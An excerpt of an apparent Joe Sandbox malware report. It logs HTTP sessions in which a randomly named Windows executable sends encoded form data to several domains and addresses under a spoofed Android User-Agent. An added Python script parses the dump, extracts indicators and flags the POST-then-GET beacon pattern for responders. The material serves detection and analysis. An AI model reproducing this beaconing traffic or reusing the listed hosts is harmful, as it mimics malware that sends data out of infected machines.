                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.independent200.org
                                                  Referer: http://www.independent200.org/yl6y/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 72 33 59 61 33 68 51 2f 4a 43 63 73 31 33 48 2b 44 49 45 78 53 52 64 66 59 6c 65 5a 51 37 48 68 46 39 75 49 66 30 50 71 70 42 4c 69 56 54 58 50 54 7a 48 69 55 37 65 55 4e 57 56 32 48 6c 51 50 73 73 70 49 67 47 46 62 66 44 56 7a 56 4b 45 79 58 6c 51 56 43 59 67 30 2b 4b 61 65 70 64 6f 69 70 4c 57 32 55 61 2b 70 67 4b 72 41 49 38 56 4a 58 56 41 69 6e 48 63 62 77 6e 77 2f 46 6c 6c 56 33 36 4d 43 57 66 46 69 4c 54 66 51 4b 50 33 72 51 70 58 54 37 65 67 31 36 50 63 64 74 4a 6a 50 64 36 51 55 78 73 33 57 59 75 5a 50 61 2f 74 68 35 53 45 48 4e 4a 61 4f 46 71 73 4a 57 76 56 61 61 44 2f 52 30 57 70 46 63 4e 48 54 65 63 79 69 6c 4f 30 7a 41 38 32 5a 6d 48 68 6e 62 33 49 2b 6f 57 78 66 74 4d 72 54 4f 41 7a 32 32 66 31 30 7a 45 44 70 35 43 4c 39 74 42 31 53 41 68 4e 35 52 56 36 58 53 50 38 78 71 77 42 36 45 62 63 45 6d 76 4b 6f 48 52 6b 70 46 50 79 55 4d 73 59 [TRUNCATED]
                                                  Data Ascii: prutfR_P=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vr3Ya3hQ/JCcs13H+DIExSRdfYleZQ7HhF9uIf0PqpBLiVTXPTzHiU7eUNWV2HlQPsspIgGFbfDVzVKEyXlQVCYg0+KaepdoipLW2Ua+pgKrAI8VJXVAinHcbwnw/FllV36MCWfFiLTfQKP3rQpXT7eg16PcdtJjPd6QUxs3WYuZPa/th5SEHNJaOFqsJWvVaaD/R0WpFcNHTecyilO0zA82ZmHhnb3I+oWxftMrTOAz22f10zEDp5CL9tB1SAhN5RV6XSP8xqwB6EbcEmvKoHRkpFPyUMsY2LoCEN/gh7eG/uWHe3BvTj6donP0AeReytR6Dw70RHp37IV8cYwsVPzie2Bhf9kui22sKeZjrbXDSefreOvpUo9TUj8+HjIq7sA4eFBmrWbtwS3vSR8Vj6eOW6Tt4JoRYXMk8NqCq9Lcrs3M7vS7tNbWWrHdU2H31fNQY1607jcjEFR5PDJQQgKaAhLX7rMIfSZ+Hq7UoyWd5zOZI7R1scBj/U+/7PWCWK19Hu70UPkgT1iuhkH0qNRYhxHUQK1pm/F0N15YJMvh/CbZ5ERnMcU/jUY/xIO49sLEahWMwIpJcNpdu0+EahKfeb5oMhUZIVHHKMT5MVNwesydTYaj6JjyIsWFSTXZb9oDt/bdJVGkWHE11Fp0Ts42kT7XqNi5vO79mT65cHnjBLOYC8TVmy9NGwXN8VkGChYC2P4kPyljtxqJRejg3WYFMhKvbyaX9+HoYR/hKO18HBkXFbCce+mkBqOAew40eUzfFrwTt2PaMQyAWdlxLCvJlobxHdszcPL5IuCjSLTcNaQDitXUNUWhl3pPRQZRW5/avAjVNxKrXRlKUcajBbQZCmNSrvAhYCxXxE5XDYnskm8vnDF4fUZZIOcnuh7en+6dQSzGsSOPe7ebdk4H57iM0LItOzwypPoOPh4tjnYbOxZoD1jza0+4I2ELHDK5po [TRUNCATED]
                                                  Sep 16, 2024 09:39:18.180404902 CEST  154                IN         HTTP/1.1 403 Forbidden
                                                  Content-Type: text/plain; charset=utf-8
                                                  Date: Mon, 16 Sep 2024 07:39:18 GMT
                                                  Content-Length: 11
                                                  Connection: close
                                                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                  Data Ascii: Bad Request


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  12          192.168.2.5  49724        103.42.108.46   80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:39:19.856473923 CEST  530                OUT        GET /yl6y/?u8b=M0MH_xux6&prutfR_P=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+FSdSIKD6JgMVQEI+NVmTQ69s3vAAdvPATGhITAPXZUXQ6A== HTTP/1.1
                                                  Host: www.independent200.org
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:39:20.746443987 CEST  154                IN         HTTP/1.1 403 Forbidden
                                                  Content-Type: text/plain; charset=utf-8
                                                  Date: Mon, 16 Sep 2024 07:39:20 GMT
                                                  Content-Length: 11
                                                  Connection: close
                                                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                  Data Ascii: Bad Request
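
Every host contacted in the sessions above receives the same exchange from the Windows process under Program Files: form-urlencoded POSTs to a short path, with Origin and Referer pointing at the target itself as if a form on that page had been submitted, repeated with growing bodies (Content-Length 209, 229, 1245), then a GET on the same path that carries the same parameter name (prutfR_P) in its query string; every request uses Connection: close and an Android SamsungBrowser User-Agent that no Windows host would send. The script below is an added example, not part of the Joe Sandbox report or of the sample's own code. It parses this dump format, including the session rows that the report flattens without separators, extracts the indicators a responder would block or hunt for (hosts, destination addresses, URLs, User-Agent, parameter names), and flags hosts that received that POST-then-GET exchange. It assumes that 192.168.2.5 is the analysis VM and that destination ports are one of 80, 443 or 8080; both assumptions exist only to disambiguate the flattened rows. The embedded sample is constructed from sessions 8, 9 and 12 above, with the encoded bodies shortened and unused headers left out.

```python
import re
from collections import defaultdict

# Constructed sample: lines copied from sessions 8, 9 and 12 above, with the
# encoded bodies cut short ("...") and unused headers left out. Not a full capture.
SAMPLE_DUMP = r"""
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
8192.168.2.54972066.81.203.200802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
TimestampBytes transferredDirectionData
Sep 16, 2024 09:38:45.387876987 CEST525OUTGET /osde/?prutfR_P=RWxN1EBN...&u8b=M0MH_xux6 HTTP/1.1
Host: www.mediaplug.biz
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36

Session IDSource IPSource PortDestination IPDestination PortPIDProcess
9192.168.2.549721103.42.108.46802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
TimestampBytes transferredDirectionData
Sep 16, 2024 09:39:12.218713045 CEST800OUTPOST /yl6y/ HTTP/1.1
Host: www.independent200.org
Content-Type: application/x-www-form-urlencoded
Origin: http://www.independent200.org
Referer: http://www.independent200.org/yl6y/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: prutfR_P=dNiLasFH...
Sep 16, 2024 09:39:13.080423117 CEST154INHTTP/1.1 403 Forbidden

Session IDSource IPSource PortDestination IPDestination PortPIDProcess
12192.168.2.549724103.42.108.46802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
TimestampBytes transferredDirectionData
Sep 16, 2024 09:39:19.856473923 CEST530OUTGET /yl6y/?u8b=M0MH_xux6&prutfR_P=QPKrZbNC... HTTP/1.1
Host: www.independent200.org
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
"""

SANDBOX_IP = "192.168.2.5"  # the analysis VM, the source of every row above (assumed)

# The session rows are flattened without separators, so they are only recoverable by
# anchoring on the known source address and on a short list of plausible destination
# ports; both are assumptions of this script, not facts stated by the report.
SESSION_ROW = re.compile(
    r"^(?P<sid>\d+)" + re.escape(SANDBOX_IP) + r"(?P<sport>\d{5})"
    r"(?P<dst>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}?)(?P<dport>80|443|8080)(?P<pid>\d+)[A-Za-z]:\\.*$")
DATA_ROW = re.compile(r"^\w{3} \d{1,2}, \d{4} [\d:.]+ [A-Za-z]+(?P<bytes>\d+)(?P<dir>IN|OUT)(?P<first>.*)$")


def parse_dump(text):
    """Return one dict per outbound HTTP request; responses (IN) and hex dumps are skipped."""
    requests, session, current = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := SESSION_ROW.match(line):
            session = m.groupdict()
            continue
        if m := DATA_ROW.match(line):
            current = None
            parts = m["first"].split(" ", 2)  # "METHOD target HTTP/1.1"
            if m["dir"] == "OUT" and session and len(parts) == 3 and parts[2].startswith("HTTP/"):
                current = {"session": session["sid"], "dst_ip": session["dst"], "method": parts[0],
                           "target": parts[1], "headers": {}, "body": ""}
                requests.append(current)
            continue
        if current is None or line.startswith("Data Raw:"):
            continue
        if line.startswith("Data Ascii: "):
            current["body"] = line[len("Data Ascii: "):]
        elif ": " in line:
            name, value = line.split(": ", 1)
            current["headers"][name.lower()] = value
    return requests


def param_names(encoded):
    """Parameter names of a form-urlencoded string such as 'a=1&b=2'."""
    return {kv.partition("=")[0] for kv in encoded.split("&") if kv}


def extract_iocs(requests):
    """Hosts, resolved addresses, URLs, User-Agent and parameter names to hunt for."""
    iocs = defaultdict(set)
    for r in requests:
        host = r["headers"].get("host", "")
        path, _, query = r["target"].partition("?")
        iocs["hosts"].add(host)
        iocs["dst_ips"].add(r["dst_ip"])
        iocs["urls"].add(f"http://{host}{path}")
        iocs["user_agents"].add(r["headers"].get("user-agent", ""))
        iocs["param_names"] |= param_names(query or r["body"])
    return dict(iocs)


def flag_beacon_hosts(requests):
    """Hosts that received the exchange shown above: a form-urlencoded POST whose Origin
    and Referer point at the target itself, then a GET on the same path whose query
    string reuses the POST body's parameter name. Content lengths are deliberately not matched."""
    posts, gets = defaultdict(set), defaultdict(set)
    for r in requests:
        h, host = r["headers"], r["headers"].get("host", "")
        path, _, query = r["target"].partition("?")
        if (r["method"] == "POST" and h.get("content-type") == "application/x-www-form-urlencoded"
                and h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{path}"):
            posts[(host, path)] |= param_names(r["body"])
        elif r["method"] == "GET":
            gets[(host, path)] |= param_names(query)
    return sorted(host for (host, path), names in posts.items() if names & gets[(host, path)])


if __name__ == "__main__":
    reqs = parse_dump(SAMPLE_DUMP)
    print(flag_beacon_hosts(reqs), extract_iocs(reqs), sep="\n")
```

Run it as a script to print the flagged hosts and the indicator sets, or pass the full report text to parse_dump() instead of SAMPLE_DUMP to cover every session. The responses in the sessions above (403 "Bad Request" from www.independent200.org, a JavaScript redirect to /lander from www.tigre777gg.online, a domain-parking page with a parking_session cookie from www.personal-loans-jp8.xyz) show that the host list is a list of contacted domains, not of confirmed live command-and-control servers, so treat the hosts as hunting indicators and the POST-then-GET exchange plus the mismatched User-Agent as the behavioural signature.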


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  13          192.168.2.5  49725        3.33.130.190    80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:39:25.803492069 CEST  797                OUT        POST /06rp/ HTTP/1.1
                                                  Host: www.tigre777gg.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.tigre777gg.online
                                                  Referer: http://www.tigre777gg.online/06rp/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 76 35 67 56 72 6c 4e 6b 34 6b 67 42 49 39 62 79 75 53 76 46 61 46 6c 61 6c 76 6c 46 78 76 44 52 7a 54 52 5a 4b 42 69 31 69 2f 37 43 4c 6e 63 57 67 59 7a 4c 65 47 43 5a 43 7a 32 41 6d 64 6b 6a 6e 66 48 50 74 69 4e 55 55 51 31 2f 42 66 6a 6a 65 6e 4c 53 6e 66 4b 4d 55 4e 62 38 76 47 41 58 63 38 54 35 37 4a 64 36 33 54 41 44 53 31 2f 57 39 6d 56 37 6d 6d 76 64 4e 38 53 76 30 73 2b 68 75 44 66 67 44 6d 66 68 6d 6e 55 42 35 35 65 64 62 52 38 77 79 6c 35 48 59 68 76 41 34 39 54 30 58 30 35 57 63 67 4d 78 63 47 2f 43 4b 77 75 62 6b 33 4c 31 6a 66 61 63 62 45 3d
                                                  Data Ascii: prutfR_P=+gx9o4ylIYGL+v5gVrlNk4kgBI9byuSvFaFlalvlFxvDRzTRZKBi1i/7CLncWgYzLeGCZCz2AmdkjnfHPtiNUUQ1/BfjjenLSnfKMUNb8vGAXc8T57Jd63TADS1/W9mV7mmvdN8Sv0s+huDfgDmfhmnUB55edbR8wyl5HYhvA49T0X05WcgMxcG/CKwubk3L1jfacbE=


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  14          192.168.2.5  49726        3.33.130.190    80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:39:28.343379021 CEST  817                OUT        POST /06rp/ HTTP/1.1
                                                  Host: www.tigre777gg.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.tigre777gg.online
                                                  Referer: http://www.tigre777gg.online/06rp/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 4c 44 51 52 37 52 59 4c 42 69 35 43 2f 37 61 62 6e 64 62 41 59 34 4c 65 61 67 5a 44 2f 32 41 6d 68 6b 6a 6a 58 48 50 61 32 4f 55 45 51 33 71 52 66 68 38 4f 6e 4c 53 6e 66 4b 4d 55 70 78 38 76 4f 41 58 4e 4d 54 37 5a 68 61 6b 6e 54 44 58 43 31 2f 53 39 6d 5a 37 6d 6e 34 64 50 59 38 76 77 63 2b 68 73 4c 66 68 57 4b 59 30 57 6e 61 50 5a 34 41 64 4c 35 77 34 78 42 77 44 62 30 64 42 70 35 61 38 42 5a 54 4d 2b 6f 6b 69 38 71 48 53 5a 34 5a 4b 55 57 69 76 41 50 71 43 4d 53 79 78 4a 2b 6d 36 6a 31 6b 41 4b 4f 5a 6a 55 44 70 64 66 6c 69
                                                  Data Ascii: prutfR_P=+gx9o4ylIYGL+MhgZqlNhYkhdY9b8OTmFaBlanDLEDLDQR7RYLBi5C/7abndbAY4LeagZD/2AmhkjjXHPa2OUEQ3qRfh8OnLSnfKMUpx8vOAXNMT7ZhaknTDXC1/S9mZ7mn4dPY8vwc+hsLfhWKY0WnaPZ4AdL5w4xBwDb0dBp5a8BZTM+oki8qHSZ4ZKUWivAPqCMSyxJ+m6j1kAKOZjUDpdfli


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  15          192.168.2.5  49727        3.33.130.190    80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:39:30.947163105 CEST  1834               OUT        POST /06rp/ HTTP/1.1
                                                  Host: www.tigre777gg.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.tigre777gg.online
                                                  Referer: http://www.tigre777gg.online/06rp/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 44 44 51 69 44 52 5a 73 39 69 34 43 2f 37 54 37 6e 59 62 41 59 6c 4c 65 53 6b 5a 44 6a 6d 41 6a 74 6b 68 45 58 48 4a 6f 4f 4f 4e 30 51 33 6f 52 66 6b 6a 65 6d 52 53 6e 50 4f 4d 55 5a 78 38 76 4f 41 58 4f 55 54 79 72 4a 61 6d 6e 54 41 44 53 31 6a 57 39 6d 39 37 6d 66 6f 64 50 63 43 73 42 67 2b 69 50 6a 66 6d 67 2b 59 32 32 6e 50 4d 5a 34 49 64 4c 6b 75 34 78 74 57 44 59 6f 33 42 75 31 61 76 67 77 76 5a 36 34 4e 33 64 4f 62 42 49 35 39 59 41 43 46 69 69 58 37 65 2f 2b 7a 34 4a 32 50 2f 58 4a 34 4d 4c 4b 56 2f 79 66 45 61 34 59 32 44 35 78 54 68 61 6b 48 73 65 2b 65 38 79 45 66 49 2f 34 67 69 59 35 45 53 59 78 73 45 71 65 6d 65 55 4e 38 78 59 37 64 47 34 43 77 70 35 56 45 72 68 39 39 52 56 39 68 4d 34 6c 43 4d 6b 59 54 6e 4d 7a 33 41 36 65 2b 42 30 39 58 51 4e 6d 47 77 68 42 64 64 75 39 45 6a 73 54 6f 67 31 71 6e 5a 67 59 2b 35 4c 52 43 31 6d 37 34 56 [TRUNCATED]
                                                  Data Ascii: prutfR_P= [TRUNCATED]


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  16          192.168.2.5  49728        3.33.130.190    80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:39:33.559560061 CEST  529                OUT        GET /06rp/?prutfR_P=ziZdrN3wZJ2qpMxPB7kqr9VBePBO99X6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYa0I3+Rjxysn3aWSNR3EoirWNXIk0ludq4g7uCmltVJnspg==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.tigre777gg.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:39:36.928082943 CEST  410                IN         HTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Mon, 16 Sep 2024 07:39:36 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 270
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 72 75 74 66 52 5f 50 3d 7a 69 5a 64 72 4e 33 77 5a 4a 32 71 70 4d 78 50 42 37 6b 71 72 39 56 42 65 50 42 4f 39 39 58 36 41 65 5a 59 41 6e 66 6e 43 44 54 51 64 6a 6a 52 59 37 34 49 73 53 65 70 44 49 62 50 5a 78 30 74 43 75 66 70 53 52 72 33 43 41 78 57 30 79 58 6e 4b 6f 53 59 61 30 49 33 2b 52 6a 78 79 73 6e 33 61 57 53 4e 52 33 45 6f 69 72 57 4e 58 49 6b 30 6c 75 64 71 34 67 37 75 43 6d 6c 74 56 4a 6e 73 70 67 3d 3d 26 75 38 62 3d 4d 30 4d 48 5f 78 75 78 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?prutfR_P=ziZdrN3wZJ2qpMxPB7kqr9VBePBO99X6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYa0I3+Rjxysn3aWSNR3EoirWNXIk0ludq4g7uCmltVJnspg==&u8b=M0MH_xux6"}</script></head></html>


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  17          192.168.2.5  49729        199.59.243.226  80                2796  C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp                             Bytes transferred  Direction  Data
                                                  Sep 16, 2024 09:39:50.206973076 CEST  812                OUT        POST /wwak/ HTTP/1.1
                                                  Host: www.personal-loans-jp8.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.personal-loans-jp8.xyz
                                                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 66 61 44 42 62 37 4e 76 69 4b 7a 35 2f 4a 48 56 4e 46 51 69 62 76 6d 50 67 6e 57 32 44 74 4f 70 42 56 4d 4d 6c 6b 4e 6e 63 77 38 56 4f 31 79 33 63 42 4a 36 72 71 54 68 44 77 4f 30 50 4a 75 38 61 7a 65 46 41 46 31 52 6e 39 4b 4b 6e 42 41 53 33 31 49 71 51 4f 57 4f 5a 45 77 38 68 2b 30 73 39 37 43 56 59 62 59 48 42 33 4c 69 75 72 7a 36 43 47 36 72 65 6f 53 58 45 55 54 38 68 6f 2f 41 6c 41 4d 30 70 65 66 52 55 46 63 65 64 4b 51 71 48 73 6f 67 53 61 4f 68 34 6a 41 74 6e 6c 37 50 7a 47 6c 56 33 43 49 45 46 6b 49 4c 4c 45 67 34 50 63 33 64 65 75 36 6a 6c 6f 3d
                                                  Data Ascii: prutfR_P=J17mq1VsyARONfaDBb7NviKz5/JHVNFQibvmPgnW2DtOpBVMMlkNncw8VO1y3cBJ6rqThDwO0PJu8azeFAF1Rn9KKnBAS31IqQOWOZEw8h+0s97CVYbYHB3Liurz6CG6reoSXEUT8ho/AlAM0pefRUFcedKQqHsogSaOh4jAtnl7PzGlV3CIEFkILLEg4Pc3deu6jlo=
                                                  Sep 16, 2024 09:39:50.728400946 CEST  1236               IN         HTTP/1.1 200 OK
                                                  date: Mon, 16 Sep 2024 07:39:50 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1154
                                                  x-request-id: b5c4d1a1-27bb-4ecb-9125-22208a0a3703
                                                  cache-control: no-store, max-age=0
                                                  accept-ch: sec-ch-prefers-color-scheme
                                                  critical-ch: sec-ch-prefers-color-scheme
                                                  vary: sec-ch-prefers-color-scheme
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                                                  set-cookie: parking_session=b5c4d1a1-27bb-4ecb-9125-22208a0a3703; expires=Mon, 16 Sep 2024 07:54:50 GMT; path=/
                                                  connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                  Sep 16, 2024 09:39:50.728446960 CEST  607                IN         Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
